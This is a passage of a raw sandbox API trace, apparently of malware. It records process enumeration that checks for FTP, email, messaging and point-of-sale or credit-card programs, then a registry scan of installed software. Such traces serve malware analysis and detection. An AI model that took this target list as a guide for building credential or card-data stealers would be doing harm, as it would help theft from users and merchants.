cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="major-enter.exe")) returned 1 [0221.292] strlen (_Str="major-enter.exe") returned 0xf [0221.292] GetProcessHeap () returned 0x2b0000 [0221.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.292] GetProcessHeap () returned 0x2b0000 [0221.292] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.292] GetProcessHeap () returned 0x2b0000 [0221.293] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.293] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="enjoy teacher pay.exe")) returned 1 [0221.294] strlen (_Str="enjoy teacher pay.exe") returned 0x15 [0221.294] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mother_heat.exe")) returned 1 [0221.296] strlen (_Str="mother_heat.exe") returned 0xf [0221.296] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pageroom.exe")) returned 1 [0221.297] strlen (_Str="pageroom.exe") returned 0xc [0221.297] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0221.300] strlen (_Str="3dftp.exe") returned 0x9 [0221.301] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0221.302] strlen (_Str="filezilla.exe") returned 0xd [0221.302] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0221.305] strlen (_Str="absolutetelnet.exe") returned 0x12 [0221.306] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0221.307] strlen (_Str="alftp.exe") returned 0x9 [0221.307] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0221.308] strlen (_Str="barca.exe") returned 0x9 [0221.308] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0221.309] strlen (_Str="bitkinex.exe") returned 0xc [0221.310] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0221.311] strlen (_Str="coreftp.exe") returned 0xb [0221.311] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0221.312] strlen (_Str="far.exe") returned 0x7 [0221.312] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0221.313] strlen (_Str="flashfxp.exe") returned 0xc [0221.313] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0221.315] strlen (_Str="fling.exe") returned 0x9 [0221.315] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0221.316] strlen (_Str="foxmailincmail.exe") returned 0x12 [0221.316] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0221.317] strlen (_Str="gmailnotifierpro.exe") returned 0x14 [0221.317] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0221.318] strlen (_Str="icq.exe") returned 0x7 [0221.319] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0221.321] strlen (_Str="leechftp.exe") returned 0xc [0221.322] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0221.323] strlen (_Str="ncftp.exe") returned 0x9 [0221.323] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0221.325] strlen (_Str="notepad.exe") returned 0xb [0221.325] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x808, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0221.326] strlen (_Str="operamail.exe") returned 0xd [0221.327] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0221.328] strlen (_Str="outlook.exe") returned 0xb [0221.328] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0221.330] strlen (_Str="pidgin.exe") returned 0xa [0221.330] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0221.331] strlen (_Str="scriptftp.exe") returned 0xd [0221.331] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x300, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0221.333] strlen (_Str="skype.exe") returned 0x9 [0221.333] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0221.340] strlen (_Str="smartftp.exe") returned 0xc [0221.340] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0221.342] strlen (_Str="thunderbird.exe") returned 0xf [0221.342] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0221.344] strlen (_Str="trillian.exe") returned 0xc [0221.344] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0221.345] strlen (_Str="webdrive.exe") returned 0xc [0221.346] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0221.347] strlen (_Str="utg2.exe") returned 0x8 [0221.347] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0221.349] strlen (_Str="spgagentservice.exe") returned 0x13 [0221.349] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0221.351] strlen (_Str="spcwin.exe") returned 0xa [0221.351] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0221.353] strlen (_Str="omnipos.exe") returned 0xb [0221.353] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0221.354] strlen (_Str="winscp.exe") returned 0xa [0221.355] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0221.356] strlen (_Str="whatsapp.exe") returned 0xc [0221.356] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0221.358] strlen (_Str="active-charge.exe") returned 0x11 [0221.358] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0221.359] strlen (_Str="yahoomessenger.exe") returned 0x12 [0221.360] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0221.361] strlen (_Str="isspos.exe") returned 0xa [0221.361] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0221.363] strlen (_Str="fpos.exe") returned 0x8 [0221.363] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0221.364] strlen (_Str="edcsvr.exe") returned 0xa [0221.364] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0221.366] strlen (_Str="creditservice.exe") returned 0x11 [0221.366] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0221.367] strlen (_Str="centralcreditcard.exe") returned 0x15 [0221.368] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0221.369] strlen (_Str="ccv_server.exe") returned 0xe [0221.369] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0221.370] strlen (_Str="aldelo.exe") returned 0xa [0221.370] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0221.372] strlen (_Str="afr38.exe") returned 0x9 [0221.372] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0221.373] strlen (_Str="accupos.exe") returned 0xb [0221.373] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0221.374] strlen (_Str="mxslipstream.exe") returned 0x10 [0221.374] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="because.exe")) returned 1 [0221.376] strlen (_Str="because.exe") returned 0xb [0221.376] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="second window.exe")) returned 1 [0221.377] strlen (_Str="second window.exe") returned 0x11 [0221.377] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="research.exe")) returned 1 [0221.378] strlen (_Str="research.exe") returned 0xc [0221.378] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.380] strlen (_Str="WmiPrvSE.exe") returned 0xc [0221.380] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0221.381] strlen (_Str="WINWORD.EXE") returned 0xb [0221.381] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0221.382] strlen (_Str="OSPPSVC.EXE") returned 0xb [0221.383] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.384] strlen (_Str="svchost.exe") returned 0xb [0221.384] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="splwow64.exe")) returned 1 [0221.385] strlen (_Str="splwow64.exe") returned 0xc [0221.385] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1 [0221.386] strlen (_Str="rundll32.exe") returned 0xc [0221.386] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0xf04, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.387] strlen (_Str="svchost.exe") returned 0xb [0221.388] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x20, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x2f0888, cntThreads=0x2, th32ParentProcessID=0x2b0000, pcPriClassBase=2, dwFlags=0x27e504, szExeFile="?'?'???????????/\x10")) returned 0 [0221.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x27ea98 | out: phkResult=0x27ea98*=0x310) returned 0x0 [0221.389] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27eecc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27eecc*=0x2b, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.389] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x0, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.390] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.390] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.390] GetProcessHeap () returned 0x2b0000 [0221.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.390] RegCloseKey (hKey=0x314) returned 0x0 [0221.390] GetProcessHeap () returned 0x2b0000 [0221.390] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0221.390] GetProcessHeap () returned 0x2b0000 [0221.390] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x44) returned 0x2c6680 [0221.390] GetProcessHeap () returned 0x2b0000 [0221.390] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x88) returned 0x2e6040 [0221.390] GetProcessHeap () returned 0x2b0000 [0221.390] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x80) returned 0x2e6040 [0221.391] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52b0 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52b0, Size=0x14) returned 0x2ceff0 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.391] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.391] RegCloseKey (hKey=0x314) returned 0x0 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.391] GetProcessHeap () returned 0x2b0000 [0221.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.391] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.392] GetProcessHeap () returned 0x2b0000 [0221.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x26) returned 0x2dc4e8 [0221.392] GetProcessHeap () returned 0x2b0000 [0221.392] RtlAllocateHeap 